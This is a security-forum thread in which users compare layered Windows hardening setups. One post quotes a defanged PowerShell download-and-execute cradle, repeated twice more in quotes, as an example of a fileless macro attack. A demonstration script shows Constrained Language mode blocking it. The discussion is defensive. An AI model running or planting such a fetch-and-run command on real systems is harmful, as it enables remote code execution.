Advanced Plus Security Quassar - Desktop PC

Last updated
Sep 7, 2018
Windows Edition
Pro
Security updates
Block all updates
User Access Control
Always notify
Real-time security
Prevention: SpyShelter Firewall + NetLimiter.
Isolation: Shadow Defender + Sandboxie
AV: SecureAPlus BETA (+Avira/APEX)
WEB: Adguard + K9 Web Protection
Firewall security
Periodic malware scanners
Zemana, Malwarebytes, SecureAPlus (+Avira/APEX)
Malware sample testing
I do not participate in malware testing
Browser(s) and extensions
Vivaldi: uMatrix, Adguard, HTTPS Everywhere, Canvas Defender,
Cookie AutoDelete.
Maintenance tools
DiskPulse, Sysinternals Suite, SysTracer, WinDirStat, AIDA64, WireShark
File and Photo backup
Paragon (on external offline disk) + SpiderOak (cloud)
System recovery
Paragon (on external offline disk)
Computer specs
https://malwaretips.com/threads/quassar-desktop-pcs.74053/

Quassar

Level 12
Thread author
Verified
Well-known
Feb 10, 2012
585
Dropped SpyShelter FW because it caused me some incompatibility issues with a few programs and games.
As an alternative I added the bundle from Scotty: WinPatrol Plus, WAR and Firewall.

The firewall is more advanced/detailed and has a connection log, while SS doesn't have it yet....
SRP techniques I have in AppGuard, which for me are also more advanced.
Keystroke encryption I now have from Zemana AL, so I turned Zemana from o/d to real time.

The only con is "HIPS swapped to Anti-exe", but with solid HIDS,
plus WinAntiRansom, though it won't have much job to do while AppGuard works in the background. At last I have a nice file/folder access log history :D

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,382
Very nice, advanced and flexible setup. Thanks for sharing. :)
I have 3 questions.
Did you disable Java or JavaScript?
What method did you apply to disable PowerShell?
How do you protect the system against VBA macros and other embedded malicious content?

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,382
This setup can be very strong when used by an experienced user like @Quassar. I use a very similar default-deny SRP setup, with Windows Defender and forced SmartScreen (instead of Zemana AntiLogger, Malwarebytes v3, and the standard SmartScreen). AppGuard can easily stop/mitigate most 0-day malware files, but I am not sure if it can stop the below fileless PowerShell example (embedded in a Word document macro):

powershell.exe -ExecutionPolicy bypass -noprofile -command "iex(New-Object Net.WebClient).DownloadString('httxx://raw.githubusercontent.com/AndyFul/Hard_Configurator---old-versions/master/Helloworld.ps1')"

Yet, if not, then in most cases the malware can be stopped at a later infection stage, or finally by Shadow Defender. Anyway, the above PowerShell example (and most PowerShell penetration tools) can be stopped by setting Constrained Language mode.

The second problem for an inexperienced user may be installing software. Malwarebytes only has signatures for recent malware, so the user can infect himself when executing older installation files (when they are ignored by SmartScreen).
SmartScreen has known limitations when the files come from pendrives (FAT32), memory cards, DVDs, ISO images, *.arj, *.7z (and other containers), or are downloaded using download managers (accelerators).

The third problem can arise when the inexperienced user plays with malware (cracks, keygens), assuming that he/she is safe using Shadow Defender. It should be remembered that, in the case of worms, they can easily infect the home network members and compromise the Internet connection.

There may be some additional small security loopholes, but none of them should be a serious problem for the experienced user.

Edit

I noticed that Malwarebytes v3 made significant slowdowns on starting some programs in Sandboxie.
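To show what Constrained Language mode actually does to the download-cradle command quoted above, here is an added demonstration (not Andy Ful's or Hard_Configurator's code). It assumes a throwaway Windows PowerShell 5.1 or later console; the in-session switch is for illustration only, since the enforced mode on a real machine comes from an AppLocker or WDAC policy.

```powershell
# Added example, not from the thread or from Hard_Configurator. Paste into a
# fresh, throwaway PowerShell 5.1+ console: the mode change is one-way for
# the session.

# 1. Audit: an unmanaged machine reports FullLanguage here.
"Language mode before: $($ExecutionContext.SessionState.LanguageMode)"

# 2. Constrain only this session. This is a demonstration, not a control: a
#    new powershell.exe would start in FullLanguage again. Persistent CLM is
#    applied by PowerShell itself once an AppLocker or WDAC policy is enforced,
#    which is the configuration the post refers to.
$ExecutionContext.SessionState.LanguageMode = 'ConstrainedLanguage'
"Language mode after:  $($ExecutionContext.SessionState.LanguageMode)"

# 3. Retry the object creation the quoted macro relies on. Under CLM,
#    New-Object is limited to a short allow-list of core types and
#    System.Net.WebClient is not on it, so the call is refused before any
#    DownloadString could run.
try {
    $client = New-Object -TypeName System.Net.WebClient
    "Not blocked: $($client.GetType().FullName) was created (session is not constrained)"
}
catch {
    # Expected error id (assumed exact text):
    # CannotCreateTypeConstrainedLanguage,Microsoft.PowerShell.Commands.NewObjectCommand
    "Blocked: $($_.FullyQualifiedErrorId)"
}
```

Running the same three steps on a machine that already reports ConstrainedLanguage in step 1 confirms that the policy, not the session hack, is doing the work.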

Quassar

Level 12
Thread author
Verified
Well-known
Feb 10, 2012
585
This setup can be very strong when used by an experienced user like @Quassar. I use a very similar default-deny SRP setup, with Windows Defender and forced SmartScreen (instead of Zemana AntiLogger, Malwarebytes v3, and the standard SmartScreen). AppGuard can easily stop/mitigate most 0-day malware files, but I am not sure if it can stop the below fileless PowerShell example (embedded in a Word document macro):

powershell.exe -ExecutionPolicy bypass -noprofile -command "iex(New-Object Net.WebClient).DownloadString('httxx://raw.githubusercontent.com/AndyFul/Hard_Configurator---old-versions/master/Helloworld.ps1')"

Yet, if not, then in most cases the malware can be stopped at a later infection stage, or finally by Shadow Defender. Anyway, the above PowerShell example (and most PowerShell penetration tools) can be stopped by setting Constrained Language mode.

The second problem for an inexperienced user may be installing software. Malwarebytes only has signatures for recent malware, so the user can infect himself when executing older installation files (when they are ignored by SmartScreen).
SmartScreen has known limitations when the files come from pendrives (FAT32), memory cards, DVDs, ISO images, *.arj, *.7z (and other containers), or are downloaded using download managers (accelerators).

The third problem can arise when the inexperienced user plays with malware (cracks, keygens), assuming that he/she is safe using Shadow Defender. It should be remembered that, in the case of worms, they can easily infect the home network members and compromise the Internet connection.

There may be some additional small security loopholes, but none of them should be a serious problem for the experienced user.

Edit

I noticed that Malwarebytes v3 made significant slowdowns on starting some programs in Sandboxie.

Test it in VMware Workstation.

So the infection needs to bypass:
1) VMware
2a) HIPS & HIDS + 2 other SRP
2b) Antivirus + 2 scanners
2c) Windows built-in security + hardening, which I don't trust at all, but anyway it's nice not to have a default naked system :p
Additional
3a) And at last it will only work temporarily until the next reboot, so it needs to bypass SD too if it wants to encrypt or modify my files permanently.
3b) If the virus is a keylogger, it needs to bypass the key encryption from Zemana.

4) I have 2 PCs and, to be "serious", dunno about you but I don't log in to my bank from the malware lab PC :p

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,382
Test it in VMware Workstation.

So the infection needs to bypass:
1) VMware
2a) HIPS & HIDS + 2 other SRP
2b) Antivirus + 2 scanners
2c) Windows built-in security + hardening, which I don't trust at all, but anyway it's nice not to have a default naked system :p
Additional
3a) And at last it will only work temporarily until the next reboot, so it needs to bypass SD too if it wants to encrypt or modify my files permanently.
3b) If the virus is a keylogger, it needs to bypass the key encryption from Zemana.

4) I have 2 PCs and, to be "serious", dunno about you but I don't log in to my bank from the malware lab PC :p
You are secure because you are an experienced user. The inexperienced user will simply infect himself by ignoring all security alerts when installing an application (with malware) from a friend's pendrive (he will assume that it is clean).
Strong security for an experienced user can be useless for the inexperienced one.
Thanks for sharing your setup, there are many experienced users here. :)
 

Quassar

Level 12
Thread author
Verified
Well-known
Feb 10, 2012
585
Yeah, that is true. A long time ago, when I worked in PC service, I had so many PCs infected with a solid anti-virus installed on them, which could easily have deleted the popular infection but didn't, because the user added it to the safelist because on xxx forum somebody wrote it is a trusted cracker - source ^^
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,382
Yeah, that is true. A long time ago, when I worked in PC service, I had so many PCs infected with a solid anti-virus installed on them, which could easily have deleted the popular infection but didn't, because the user added it to the safelist because on xxx forum somebody wrote it is a trusted cracker - source ^^
Ha, ha. They did not use BitDefender Free. :)
 
5

509322

AppGuard can easily stop/mitigate most 0-day malware files, but I am not sure if it can stop the below fileless PowerShell example (embedded in a Word document macro):

powershell.exe -ExecutionPolicy bypass -noprofile -command "iex(New-Object Net.WebClient).DownloadString('httxx://raw.githubusercontent.com/AndyFul/Hard_Configurator---old-versions/master/Helloworld.ps1')"

Using the default policies, an in-memory PowerShell script will run with restricted privileges.

The best protection against a PowerShell disaster is to disable PowerShell and system.management.automation.dll. These policies also cover custom\wrapped PowerShell executables and .dll.

Handsome Recluse

Level 23
Verified
Top Poster
Well-known
Nov 17, 2016
1,242
Why have both Adguard and Hostsman? There doesn't seem to be much frequent extra coverage from the addition. The only things that should be common are from ubiquitous sites like Google, Facebook and some lesser sites like Amazon and Twitter. Stuff such as those in the uBlock Privacy list like

5

509322


I have the best solution of all.

PowerShell in its entire monstrosity should not be shipped by default with Windows; it should be a user opt-in, manual, standalone installation. Making it such pretty much means only those that actually need and use it - like enterprise admins - will install it.

It makes no sense that Microsoft ships it, but at the same time advises everyone that does not need it to disable it.

As long as the users continue to allow Microsoft to ram things down their throats that greatly increase the risk of system compromise, Microsoft will continue to do it.

Who is responsible for the mess that is Windows? Microsoft. And 3rd parties have to fix that mess the best that they can with what they have.
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,382
I have the best solution of all.
...
PowerShell in its entire monstrosity should not be shipped by default with Windows; it should be a user opt-in, manual, standalone installation. Making it such pretty much means only those that actually need and use it - like enterprise admins - will install it.

It makes no sense that Microsoft ships it, but at the same time advises everyone that does not need it to disable it.
...
Bash is another similar problem. Actually, both PowerShell and Bash can be installed by the malware on the target computer, using the remote server. So, even uninstalling PowerShell would not be bulletproof. Pandora's box is already open.
Windows is a great example that something universally useful cannot be safe (enterprises, administrators, home users, local networks, Active Directory domains, Internet, many protocols, backward compatibility, several OS shells, remote access, sharing, and much more).

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,382
Changed OS malware testing to NO because I test it on a separate PC/Raspberry which is not connected to the rest of my house devices :D
So, are you using a separate router too, for maximum security?